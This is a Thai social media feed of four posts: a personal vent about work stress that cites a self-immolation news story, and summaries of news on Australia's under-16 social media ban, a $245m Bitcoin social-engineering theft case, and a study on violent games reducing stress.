    วันนี้นอยด์สุดๆเลย นึกว่าทำงานเสร็จหมดแล้ว ที่ไหนได้ จัดฉากให้ผมมารู้ทีหลังว่างานยังไม่เสร็จ บางทีอยากเป็นไอ้เด็กเร่ร่อนโง่ๆดีกว่าเป็นวัวเป็นควายเป็นลูกจ้างเป็นทาสชั้นต่ำให้คนอย่างพวกเขา
    ลิงค์ที่มาของข่าว อัมรินทร์ ทีวี (ไม่ใช่ของอ่ำ อัมรินทร์)
    https://www.amarintv.com/news/social/219340
    หนุ่มเครียด! ใช้น้ำมันราดตัวเองแล้วจุดไฟเผาตัวเอง ดับสลดต่อหน้าแม่ คาดเครียดเรื่องที่ป่วยขาเป็นแผลมานานจนทำงานไม่ถนัด ผมอ่านรายละเอียดของข่าวในลิงค์แล้ว ขาเป็นแผล หมอไม่ค่อยรับรักษา ยาที่รักษาก็ไม่ได้ผล ผมนึกถึงตระกูล ส. และ หมอผีหมอมู สปสช. แล้วรู้สึกเจ็บใจว่ะ ถึงว่าทำไมใต้ข้อพับขาขวาคันติดเชื้อราไม่หายไม่พอแถมไปติดข้อพับขาซ้ายอีก เป็นนายตัวเองแต่สำหรับผมขาเป็นแผลไม่ใช่ปัญหา แต่ความคาดหวังและแรงกดดันจากคนรอบข้างผมพยายามจะไม่ให้ความสนใจ แต่มาให้ความสนใจจนผมดิ่ง นอยด์ จนผมรู้สึกว่าผมขอลาขาดจากวงคุยการเมืองไปทุกทีๆแล้ว เพราะโหนกระแส บางทีมีนักการเมืองพรรคสีแดง พรรคสีส้ม คอยให้ท้าย โหนกระแสไม่เคยขยี้นักการเมืองส้นตีนพวกนั้นเลย ผมแทบจะยั้งอารมณ์โทสะที่จะนำไปสู่การ ทำร้...ตัวเอง จนนำไปสู่เหตุปัจจัยร้ายแรงต่อไปได้ รู้จักระงับ รู้จักปล่อยวาง แต่ก็จะพยายามละทิ้งไม่ให้จมอยู่กับความคิดและความทรงจำเดิมๆที่มีแต่ความย่ำแย่และพาถอยหลังลงหลุมดำ อาชีพช่างออกแบบเฟอร์นิเจอร์หรือวิศวกรเฟอร์นิเจอร์ บางทีถ้าทำงานให้ไอ้เจ้านายปากท็อกซิกผมว่าไม่มีวันรุ่งเรืองในอนาคตหรอก แต่ออกมาเป็นนายตัวเองรุ่งเรืองกว่าเก่านะ แถมได้ฮีลใจไปด้วย มีเวลาว่างเที่ยวกินเท่าไหร่ก็ได้ตามใจฉัน แต่ขอใช้จ่ายอย่างระมัดระวัง วันนี้นอยด์สุดๆเลย นึกว่าทำงานเสร็จหมดแล้ว ที่ไหนได้ จัดฉากให้ผมมารู้ทีหลังว่างานยังไม่เสร็จ บางทีอยากเป็นไอ้เด็กเร่ร่อนโง่ๆดีกว่าเป็นวัวเป็นควายเป็นลูกจ้างเป็นทาสชั้นต่ำให้คนอย่างพวกเขา ลิงค์ที่มาของข่าว อัมรินทร์ ทีวี (ไม่ใช่ของอ่ำ อัมรินทร์) https://www.amarintv.com/news/social/219340
    0 ความคิดเห็น 0 การแบ่งปัน 253 มุมมอง 0 รีวิว
  • รัฐบาลออสเตรเลียตั้งเป้าจะ “ถอดบัญชีโซเชียลมีเดียของเยาวชนอายุ 10–15 ปีมากกว่า 1 ล้านบัญชี” → โดยตั้งกฎหมายใหม่ให้ “ผู้ใช้ต้องมีอายุอย่างน้อย 16 ปี” จึงจะใช้งานโซเชียลมีเดียได้ → ถ้าฝ่าฝืน บริษัทแพลตฟอร์มจะถูกปรับถึง A$30 ล้าน (≒ 820 ล้านบาท!)

    แต่ปัญหาคือ…กฎหมายผ่านแล้ว แต่ขั้นตอนปฏิบัติยังไม่ชัดเจน → จะนิยามว่า “โซเชียลมีเดีย” ว่าอะไรบ้าง? เช่น YouTube จะนับรวมไหม? → จะยืนยันอายุผู้ใช้แบบไหน? ใช้ AI, เอกสาร หรือการตรวจสอบโดยมนุษย์? → หากใช้ VPN เปลี่ยนที่อยู่ จะรับมือยังไง?

    หลายแพลตฟอร์มอย่าง YouTube ออกมาคัดค้าน → เพราะมองว่า “ตัวเองไม่ใช่โซเชียล แต่เป็นแพลตฟอร์มวิดีโอเพื่อการเรียนรู้” → กว่า 80% ของครูออสเตรเลียใช้ YouTube ในห้องเรียน → แต่หน่วยงานความปลอดภัยยืนยันว่าต้องรวม YouTube เพราะเด็กใช้มากที่สุดและมีฟีเจอร์ like, share, comment

    ตอนนี้ยังอยู่ในช่วงหารือกับบริษัทเทคโนโลยี → ต้องตกลงให้ได้ว่าบริษัทต้องทำอะไรเพื่อแสดงว่า “กำลังพยายามป้องกันไม่ให้เด็กต่ำกว่า 16 มีบัญชี” → รวมถึงต้องมีช่องให้ครู–ผู้ปกครองแจ้งบัญชีต้องสงสัย และมีวิธีป้องกันการหลบหลีกผ่าน VPN ด้วย

    ออสเตรเลียเตรียมใช้กฎหมายใหม่ที่ “ห้ามเด็กอายุต่ำกว่า 16 ใช้โซเชียลมีเดีย” เริ่ม ธ.ค. 2025  
    • มีบทลงโทษแพลตฟอร์มละเมิดสูงถึง A$30 ล้าน  
    • คาดว่าจะกระทบบัญชีเยาวชนมากกว่า 1 ล้านราย

    แพลตฟอร์มที่ได้รับผลกระทบอาจรวมถึง YouTube, Instagram, TikTok, X, Facebook ฯลฯ  
    • YouTube เคยคาดว่าจะถูกยกเว้น แต่ถูกบอกว่าต้องรวม เพราะเด็กใช้มากและมีฟีเจอร์ “เสพติด”

    ยังไม่มีแนวทางชัดเจนว่าจะ “ยืนยันอายุผู้ใช้” อย่างไร  
    • ทดลองระบบยืนยันอายุแล้ว แต่ยังไม่ประกาศผลอย่างเป็นทางการ  
    • อยู่ระหว่างหารือกับบริษัทเทคโนโลยีเรื่องแนวทางปฏิบัติ

    ประเทศอื่นๆ เริ่มเดินตามแนวคิดนี้ เช่น นิวซีแลนด์ และฝรั่งเศส  
    • ฝรั่งเศสเตรียมห้ามเด็กต่ำกว่า 15 ใช้โซเชียลเช่นกัน

    https://www.thestar.com.my/tech/tech-news/2025/07/07/australia-wants-to-bar-children-from-social-media-can-it-succeed
    รัฐบาลออสเตรเลียตั้งเป้าจะ “ถอดบัญชีโซเชียลมีเดียของเยาวชนอายุ 10–15 ปีมากกว่า 1 ล้านบัญชี” → โดยตั้งกฎหมายใหม่ให้ “ผู้ใช้ต้องมีอายุอย่างน้อย 16 ปี” จึงจะใช้งานโซเชียลมีเดียได้ → ถ้าฝ่าฝืน บริษัทแพลตฟอร์มจะถูกปรับถึง A$30 ล้าน (≒ 820 ล้านบาท!) แต่ปัญหาคือ…กฎหมายผ่านแล้ว แต่ขั้นตอนปฏิบัติยังไม่ชัดเจน → จะนิยามว่า “โซเชียลมีเดีย” ว่าอะไรบ้าง? เช่น YouTube จะนับรวมไหม? → จะยืนยันอายุผู้ใช้แบบไหน? ใช้ AI, เอกสาร หรือการตรวจสอบโดยมนุษย์? → หากใช้ VPN เปลี่ยนที่อยู่ จะรับมือยังไง? หลายแพลตฟอร์มอย่าง YouTube ออกมาคัดค้าน → เพราะมองว่า “ตัวเองไม่ใช่โซเชียล แต่เป็นแพลตฟอร์มวิดีโอเพื่อการเรียนรู้” → กว่า 80% ของครูออสเตรเลียใช้ YouTube ในห้องเรียน → แต่หน่วยงานความปลอดภัยยืนยันว่าต้องรวม YouTube เพราะเด็กใช้มากที่สุดและมีฟีเจอร์ like, share, comment ตอนนี้ยังอยู่ในช่วงหารือกับบริษัทเทคโนโลยี → ต้องตกลงให้ได้ว่าบริษัทต้องทำอะไรเพื่อแสดงว่า “กำลังพยายามป้องกันไม่ให้เด็กต่ำกว่า 16 มีบัญชี” → รวมถึงต้องมีช่องให้ครู–ผู้ปกครองแจ้งบัญชีต้องสงสัย และมีวิธีป้องกันการหลบหลีกผ่าน VPN ด้วย ✅ ออสเตรเลียเตรียมใช้กฎหมายใหม่ที่ “ห้ามเด็กอายุต่ำกว่า 16 ใช้โซเชียลมีเดีย” เริ่ม ธ.ค. 2025   • มีบทลงโทษแพลตฟอร์มละเมิดสูงถึง A$30 ล้าน   • คาดว่าจะกระทบบัญชีเยาวชนมากกว่า 1 ล้านราย ✅ แพลตฟอร์มที่ได้รับผลกระทบอาจรวมถึง YouTube, Instagram, TikTok, X, Facebook ฯลฯ   • YouTube เคยคาดว่าจะถูกยกเว้น แต่ถูกบอกว่าต้องรวม เพราะเด็กใช้มากและมีฟีเจอร์ “เสพติด” ✅ ยังไม่มีแนวทางชัดเจนว่าจะ “ยืนยันอายุผู้ใช้” อย่างไร   • ทดลองระบบยืนยันอายุแล้ว แต่ยังไม่ประกาศผลอย่างเป็นทางการ   • อยู่ระหว่างหารือกับบริษัทเทคโนโลยีเรื่องแนวทางปฏิบัติ ✅ ประเทศอื่นๆ เริ่มเดินตามแนวคิดนี้ เช่น นิวซีแลนด์ และฝรั่งเศส   • ฝรั่งเศสเตรียมห้ามเด็กต่ำกว่า 15 ใช้โซเชียลเช่นกัน https://www.thestar.com.my/tech/tech-news/2025/07/07/australia-wants-to-bar-children-from-social-media-can-it-succeed
    WWW.THESTAR.COM.MY
    Australia wants to bar children from social media. Can it succeed?
    A law that restricts social media use to people 16 and over goes into effect in December, but much about it remains unclear or undecided.
    0 ความคิดเห็น 0 การแบ่งปัน 338 มุมมอง 0 รีวิว
  • เรื่องราวเริ่มจาก Chetal และพวก 2 คน ใช้เทคนิค social engineering ปลอมตัวเป็นเจ้าหน้าที่ Google/Yahoo หลอกเหยื่อจากวอชิงตัน ดี.ซี. จนสามารถขโมย Bitcoin จำนวน 4,100 เหรียญ มูลค่าราว $245 ล้าน (และตอนนี้ขึ้นมาเกือบ $440 ล้านแล้ว!)

    จากนั้นเขาใช้เงินที่ได้ไปใช้ชีวิตหรูหราทั้งซื้อรถ, เช่าคฤหาสน์, ปาร์ตี้ไนต์คลับ และเครื่องเพชร — จนกลายเป็นเป้าสายตาแบบเต็ม ๆ

    และเรื่องดันบานปลาย เมื่อ พ่อแม่ของ Chetal ถูกกลุ่มอาชญากรจากฟลอริดารุมทำร้าย-ลักพาตัว แบบกลางวันแสก ๆ ด้วยการเอารถชน, มัดมือ, ยัดใส่รถตู้ — แต่โชคดีที่มีเจ้าหน้าที่ FBI นอกเครื่องแบบอยู่ใกล้ ๆ และช่วยได้ทัน

    ต่อมา FBI บุกค้นบ้าน พบเงินสด $500,000 และคริปโตอีก $39 ล้าน ซ้ำยังพบว่า Chetal เคยก่อเหตุแบบเดียวกันอีกเกือบ 50 ครั้ง รวมรายได้อีก $3 ล้าน

    ตอนนี้ Chetal ยอมรับผิดและให้ความร่วมมือกับทางการ เพื่อแลกกับโทษที่เบาลง — แต่อาจต้องติดคุก 19–24 ปี, ถูกปรับสูงสุด $500,000 และอาจ ถูกเนรเทศกลับอินเดีย เพราะเป็นผู้ย้ายถิ่นตั้งแต่ยังเด็ก

    ข้อมูลจากข่าว:
    Veer Chetal และพรรคพวกขโมย Bitcoin จำนวน 4,100 BTC มูลค่า $245 ล้าน ในเดือนส.ค. 2024  
    • ใช้การหลอกลวงแบบ social engineering ด้วยการปลอมเป็นเจ้าหน้าที่บริการเว็บชื่อดัง

    หลังการขโมย Chetal ใช้ชีวิตฟุ่มเฟือย  
    • ซื้อรถหรู, เครื่องเพชร, เช่าคฤหาสน์ และปาร์ตี้อย่างรื่นเริง

    พ่อแม่ของเขาถูกกลุ่มชายจากฟลอริดาลักพาตัวกลางวันแสก ๆ ด้วยความรุนแรง  
    • โชคดีที่มี FBI อยู่ในเหตุการณ์ ทำให้ช่วยไว้ได้ทัน

    FBI ค้นบ้านพบ $500,000 เงินสด และ crypto อีก $39 ล้าน  
    • ตรวจพบว่ามีคดีคล้ายกันอีก 50 ครั้ง รวมเงิน $3 ล้าน

    Chetal ยอมรับผิดข้อหาฉ้อโกงและฟอกเงิน  
    • เตรียมรับโทษจำคุก 19–24 ปี และปรับ $50,000–$500,000 พร้อมชดใช้เหยื่อ  
    • อาจถูกเนรเทศกลับอินเดีย เพราะไม่ใช่พลเมืองสหรัฐฯ

    พ่อของเขาถูกไล่ออกจาก Morgan Stanley จากเหตุผลเกี่ยวกับคดีนี้

    https://www.tomshardware.com/tech-industry/cryptocurrency/man-behind-usd245m-bitcoin-theft-has-bizarre-tale-that-includes-kidnapped-parents-fraud-and-money-laundering-suspect-now-faces-up-to-24-years-in-prison-half-million-dollar-fine-and-possible-deportation-to-india
    เรื่องราวเริ่มจาก Chetal และพวก 2 คน ใช้เทคนิค social engineering ปลอมตัวเป็นเจ้าหน้าที่ Google/Yahoo หลอกเหยื่อจากวอชิงตัน ดี.ซี. จนสามารถขโมย Bitcoin จำนวน 4,100 เหรียญ มูลค่าราว $245 ล้าน (และตอนนี้ขึ้นมาเกือบ $440 ล้านแล้ว!) จากนั้นเขาใช้เงินที่ได้ไปใช้ชีวิตหรูหราทั้งซื้อรถ, เช่าคฤหาสน์, ปาร์ตี้ไนต์คลับ และเครื่องเพชร — จนกลายเป็นเป้าสายตาแบบเต็ม ๆ และเรื่องดันบานปลาย เมื่อ พ่อแม่ของ Chetal ถูกกลุ่มอาชญากรจากฟลอริดารุมทำร้าย-ลักพาตัว แบบกลางวันแสก ๆ ด้วยการเอารถชน, มัดมือ, ยัดใส่รถตู้ — แต่โชคดีที่มีเจ้าหน้าที่ FBI นอกเครื่องแบบอยู่ใกล้ ๆ และช่วยได้ทัน ต่อมา FBI บุกค้นบ้าน พบเงินสด $500,000 และคริปโตอีก $39 ล้าน ซ้ำยังพบว่า Chetal เคยก่อเหตุแบบเดียวกันอีกเกือบ 50 ครั้ง รวมรายได้อีก $3 ล้าน ตอนนี้ Chetal ยอมรับผิดและให้ความร่วมมือกับทางการ เพื่อแลกกับโทษที่เบาลง — แต่อาจต้องติดคุก 19–24 ปี, ถูกปรับสูงสุด $500,000 และอาจ ถูกเนรเทศกลับอินเดีย เพราะเป็นผู้ย้ายถิ่นตั้งแต่ยังเด็ก ✅ ข้อมูลจากข่าว: ✅ Veer Chetal และพรรคพวกขโมย Bitcoin จำนวน 4,100 BTC มูลค่า $245 ล้าน ในเดือนส.ค. 2024   • ใช้การหลอกลวงแบบ social engineering ด้วยการปลอมเป็นเจ้าหน้าที่บริการเว็บชื่อดัง ✅ หลังการขโมย Chetal ใช้ชีวิตฟุ่มเฟือย   • ซื้อรถหรู, เครื่องเพชร, เช่าคฤหาสน์ และปาร์ตี้อย่างรื่นเริง ✅ พ่อแม่ของเขาถูกกลุ่มชายจากฟลอริดาลักพาตัวกลางวันแสก ๆ ด้วยความรุนแรง   • โชคดีที่มี FBI อยู่ในเหตุการณ์ ทำให้ช่วยไว้ได้ทัน ✅ FBI ค้นบ้านพบ $500,000 เงินสด และ crypto อีก $39 ล้าน   • ตรวจพบว่ามีคดีคล้ายกันอีก 50 ครั้ง รวมเงิน $3 ล้าน ✅ Chetal ยอมรับผิดข้อหาฉ้อโกงและฟอกเงิน   • เตรียมรับโทษจำคุก 19–24 ปี และปรับ $50,000–$500,000 พร้อมชดใช้เหยื่อ   • อาจถูกเนรเทศกลับอินเดีย เพราะไม่ใช่พลเมืองสหรัฐฯ ✅ พ่อของเขาถูกไล่ออกจาก Morgan Stanley จากเหตุผลเกี่ยวกับคดีนี้ https://www.tomshardware.com/tech-industry/cryptocurrency/man-behind-usd245m-bitcoin-theft-has-bizarre-tale-that-includes-kidnapped-parents-fraud-and-money-laundering-suspect-now-faces-up-to-24-years-in-prison-half-million-dollar-fine-and-possible-deportation-to-india
    WWW.TOMSHARDWARE.COM
    Man behind $245m Bitcoin theft has bizarre tale that includes kidnapped parents, fraud, and money laundering — suspect now faces up to 24 years in prison, half-million-dollar fine, and possible deportation to India
    Connecticut man’s parents were kidnapped shortly after the BTC theft. The father allegedly lost his job at Morgan Stanley due to his son’s nefarious activities.
    0 ความคิดเห็น 0 การแบ่งปัน 548 มุมมอง 0 รีวิว
  • นักวิจัยจากเยอรมนีเลือกเกม A Plague Tale: Requiem ซึ่งเป็นเกมแอ็กชันดราม่าที่มีฉากรุนแรงชัดเจน พวกเขาแบ่งกลุ่มทดลองออกเป็นสองกลุ่ม:
    - กลุ่มแรกเล่น “ฉากรุนแรง” เช่น การต่อสู้หรือฆ่าศัตรู
    - กลุ่มที่สองเล่น “ฉากไม่รุนแรง” เช่น สำรวจหรือเล่าเนื้อเรื่อง

    ก่อนเล่น ทีมวิจัยทำให้ผู้ร่วมทดลอง “เครียด” โดยให้จุ่มมือในน้ำเย็นจัด 3 นาทีและโดนสอบสวนในเวลาเดียวกัน (เรียกว่า SECPT) เพื่อให้เกิดความเครียดทั้งทางกายและใจ จากนั้นให้เล่นเกม 25 นาที และวัดผลทั้งจากคลื่นหัวใจ, น้ำลาย และแบบสอบถาม

    ผลลัพธ์น่าสนใจคือ:
    - คนที่เล่นฉากรุนแรง “รู้สึกเครียดกว่า” ตอนตอบแบบสอบถาม
    - แต่เครื่องมือทางสรีรวิทยาพบว่า “ร่างกายของทั้งสองกลุ่มกลับลดความเครียดลง”

    แปลว่าเกมรุนแรงก็อาจ “ปล่อยระบาย” ความเครียดออกจากร่างกายได้ แม้ตัวเราจะไม่รู้ตัวเองก็ตาม

    ทั้งฉากรุนแรงและไม่รุนแรงของเกมสามารถลดระดับความเครียดทางสรีรวิทยาได้จริง  
    • วัดจาก ECG (คลื่นหัวใจ), น้ำลาย และอาการทางกาย

    แบบสอบถามชี้ว่าผู้เล่นฉากรุนแรงรู้สึกเครียดกว่า  
    • แต่อาการทางกายกลับบ่งชี้ว่าผ่อนคลายมากขึ้น

    นักวิจัยอธิบายว่าเป็น “dissociation” ระหว่างความรู้สึกและสภาพร่างกายจริง ๆ  
    • คนอาจประเมินอารมณ์ตัวเองคลาดเคลื่อนจากความจริง

    เกมที่ใช้คือ A Plague Tale: Requiem บน PS5 และฉากที่เลือกทั้งดราม่าและการต่อสู้  
    • มีผู้ร่วมทดลอง 82 คน อายุ 18–40 ปี ส่วนใหญ่มีประสบการณ์เล่นเกม

    ใช้การเหนี่ยวนำความเครียดแบบ SECPT (Socially Evaluated Cold Pressor Test)  
    • เป็นวิธีมาตรฐานที่ใช้ในจิตวิทยาการแพทย์และสรีรวิทยา

    https://www.techspot.com/news/108453-study-shows-gaming-can-reduce-stress-even-violent.html
    นักวิจัยจากเยอรมนีเลือกเกม A Plague Tale: Requiem ซึ่งเป็นเกมแอ็กชันดราม่าที่มีฉากรุนแรงชัดเจน พวกเขาแบ่งกลุ่มทดลองออกเป็นสองกลุ่ม: - กลุ่มแรกเล่น “ฉากรุนแรง” เช่น การต่อสู้หรือฆ่าศัตรู - กลุ่มที่สองเล่น “ฉากไม่รุนแรง” เช่น สำรวจหรือเล่าเนื้อเรื่อง ก่อนเล่น ทีมวิจัยทำให้ผู้ร่วมทดลอง “เครียด” โดยให้จุ่มมือในน้ำเย็นจัด 3 นาทีและโดนสอบสวนในเวลาเดียวกัน (เรียกว่า SECPT) เพื่อให้เกิดความเครียดทั้งทางกายและใจ จากนั้นให้เล่นเกม 25 นาที และวัดผลทั้งจากคลื่นหัวใจ, น้ำลาย และแบบสอบถาม ผลลัพธ์น่าสนใจคือ: - คนที่เล่นฉากรุนแรง “รู้สึกเครียดกว่า” ตอนตอบแบบสอบถาม - แต่เครื่องมือทางสรีรวิทยาพบว่า “ร่างกายของทั้งสองกลุ่มกลับลดความเครียดลง” แปลว่าเกมรุนแรงก็อาจ “ปล่อยระบาย” ความเครียดออกจากร่างกายได้ แม้ตัวเราจะไม่รู้ตัวเองก็ตาม ✅ ทั้งฉากรุนแรงและไม่รุนแรงของเกมสามารถลดระดับความเครียดทางสรีรวิทยาได้จริง   • วัดจาก ECG (คลื่นหัวใจ), น้ำลาย และอาการทางกาย ✅ แบบสอบถามชี้ว่าผู้เล่นฉากรุนแรงรู้สึกเครียดกว่า   • แต่อาการทางกายกลับบ่งชี้ว่าผ่อนคลายมากขึ้น ✅ นักวิจัยอธิบายว่าเป็น “dissociation” ระหว่างความรู้สึกและสภาพร่างกายจริง ๆ   • คนอาจประเมินอารมณ์ตัวเองคลาดเคลื่อนจากความจริง ✅ เกมที่ใช้คือ A Plague Tale: Requiem บน PS5 และฉากที่เลือกทั้งดราม่าและการต่อสู้   • มีผู้ร่วมทดลอง 82 คน อายุ 18–40 ปี ส่วนใหญ่มีประสบการณ์เล่นเกม ✅ ใช้การเหนี่ยวนำความเครียดแบบ SECPT (Socially Evaluated Cold Pressor Test)   • เป็นวิธีมาตรฐานที่ใช้ในจิตวิทยาการแพทย์และสรีรวิทยา https://www.techspot.com/news/108453-study-shows-gaming-can-reduce-stress-even-violent.html
    WWW.TECHSPOT.COM
    Study shows gaming can reduce stress, even the violent kind
    A recently published study aims to dispel yet another myth about video games, showing that both violent and non-violent gaming sessions can effectively reduce stress levels. The...
    0 ความคิดเห็น 0 การแบ่งปัน 277 มุมมอง 0 รีวิว
Pages Boosts